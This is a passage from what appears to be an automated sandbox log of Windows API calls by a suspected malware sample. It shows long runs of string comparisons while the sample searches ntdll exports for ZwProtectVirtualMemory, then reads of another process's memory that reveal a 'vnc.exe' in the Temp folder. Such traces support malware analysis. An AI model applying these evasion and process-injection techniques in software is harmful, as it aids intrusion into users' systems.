(lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.799] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1 [0135.800] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1 [0135.801] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.802] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwProtectVirtualMemory") returned -1 [0135.803] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1 [0135.804] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1 [0135.805] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1 [0135.806] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1 [0135.807] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1 [0135.808] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0135.809] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1 [0135.810] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1 [0135.811] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0135.812] VirtualFree (lpAddress=0xa90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.825] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0135.825] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0135.825] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef54, ProcessInformationLength=0x30, ReturnLength=0x19efac | out: ProcessInformation64=0x19ef54, ReturnLength=0x19efac) returned 0x0 [0135.826] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0135.826] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0135.826] LocalFree (hMem=0x629120) returned 0x0 [0135.826] LocalFree (hMem=0x61df68) returned 0x0 [0135.826] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0135.826] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0135.826] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0135.826] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef54, ProcessInformationLength=0x30, ReturnLength=0x19efac | out: ProcessInformation64=0x19ef54, ReturnLength=0x19efac) returned 0x0 [0135.827] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0135.827] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e18a8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x58 | out: Buffer=0x0, NumberOfBytesRead=0x58) returned 0x0 [0135.827] StrRChrA (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpEnd=0x0, wMatch=0x5c) returned="\\vnc.exe" [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e19f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0135.827] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2290, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0135.827] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0135.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, 